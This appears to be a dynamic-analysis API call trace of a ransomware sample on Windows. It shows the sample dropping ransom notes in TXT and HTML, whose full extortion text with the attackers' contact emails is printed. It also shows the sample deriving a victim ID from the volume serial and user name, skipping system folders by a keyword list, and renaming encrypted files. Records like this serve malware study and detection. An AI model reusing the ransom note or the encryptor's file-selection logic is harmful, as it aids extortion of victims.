	[0168.616] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json.bk")) returned 0
	[0168.616] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x598, dwReserved0=0x0, dwReserved1=0x0, cFileName="utc.app.json.bk", cAlternateFileName="UTCAPP~1.BK")) returned 0
	[0168.617] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0168.617] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0168.617] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings"
	[0168.617] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*"
	[0168.618] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.618] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.618] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\HELP_DECRYPT_YOUR_FILES.TXT") returned 85
	[0168.618] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.627] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0168.627] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0168.631] CloseHandle (hObject=0x388) returned 1
	[0168.632] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.632] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0168.635] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0168.635] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.635] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0168.639] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0168.639] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0168.640] CloseHandle (hObject=0x388) returned 1
	[0168.640] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.640] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.641] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.641] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\HELP_DECRYPT_YOUR_FILES.HTML") returned 86
	[0168.641] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.641] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.641] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0168.644] CloseHandle (hObject=0x388) returned 1
	[0168.645] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.645] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.646] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.646] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0168.647] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.647] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0168.647] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.648] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.648] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0168.648] CloseHandle (hObject=0x388) returned 1
	[0168.649] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7e079d1f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e0c60ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.649] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*") returned 61
	[0168.649] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.649] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*") returned 0x3d
	[0168.649] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.649] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="windows") returned 0x0
	[0168.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.655] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="boot") returned 0x0
	[0168.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.656] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="system volume information") returned 0x0
	[0168.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.656] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.656] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="temp") returned 0x0
	[0168.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.657] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="program files") returned 0x0
	[0168.657] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.657] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.657] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.657] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="appdata") returned 0x0
	[0168.657] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.658] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="application data") returned 0x0
	[0168.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.658] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="winnt") returned 0x0
	[0168.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.658] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="tmp") returned 0x0
	[0168.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.658] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="cache") returned 0x0
	[0168.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.659] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.659] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.659] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="webcache") returned 0x0
	[0168.659] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.659] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="inetcache") returned 0x0
	[0168.659] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.659] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="nvidia") returned 0x0
	[0168.659] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.660] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="packages") returned 0x0
	[0168.660] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.660] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="cookies") returned 0x0
	[0168.660] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.660] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="programdata") returned 0x0
	[0168.660] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.660] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.660] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7e079d1f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e0c60ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.661] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xdfc4722e, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xdfc4722e, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xdff8e649, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="cfc.flights.json", cAlternateFileName="CFCFLI~1.JSO")) returned 1
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0c60ce, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e0c60ce, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e0c60ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e09fdfa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e09fdfa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e0c60ce, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0db65ac, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x4a30b, dwReserved0=0x0, dwReserved1=0x0, cFileName="telemetry.ASM-WindowsDefault.json", cAlternateFileName="TELEME~1.JSO")) returned 1
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0075a8, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e0075a8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e0075a8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x0, cFileName="telemetry.asm-windowsdefault.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="TELEME~1.SCL")) returned 1
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0964002, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0db65ac, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x14615, dwReserved0=0x0, dwReserved1=0x0, cFileName="utc.app.json", cAlternateFileName="UTCAPP~1.JSO")) returned 1
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e079d1f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e079d1f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e079d1f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="utc.app.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UTCAPP~1.SCL")) returned 1
	[0168.661] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e079d1f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e079d1f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e079d1f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="utc.app.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="UTCAPP~1.SCL")) returned 0
	[0168.661] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.662] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.662] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ETLLogs", cAlternateFileName="")) returned 1
	[0168.662] lstrcmpW (lpString1="ETLLogs", lpString2="..") returned 1
	[0168.662] lstrcmpW (lpString1="ETLLogs", lpString2=".") returned 1
	[0168.662] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0168.663] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.663] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="ETLLogs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs"
	[0168.663] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs"
	[0168.663] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\"
	[0168.663] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\"
	[0168.663] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*"
	[0168.663] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.664] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*") returned 50
	[0168.664] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.664] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*") returned 0x32
	[0168.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.664] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="windows") returned 0x0
	[0168.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="boot") returned 0x0
	[0168.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="system volume information") returned 0x0
	[0168.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.665] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.685] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="temp") returned 0x0
	[0168.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.686] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="program files") returned 0x0
	[0168.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.686] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.686] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="appdata") returned 0x0
	[0168.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.687] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\*.*", lpSrch="application data") returned 0x0
	[0168.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
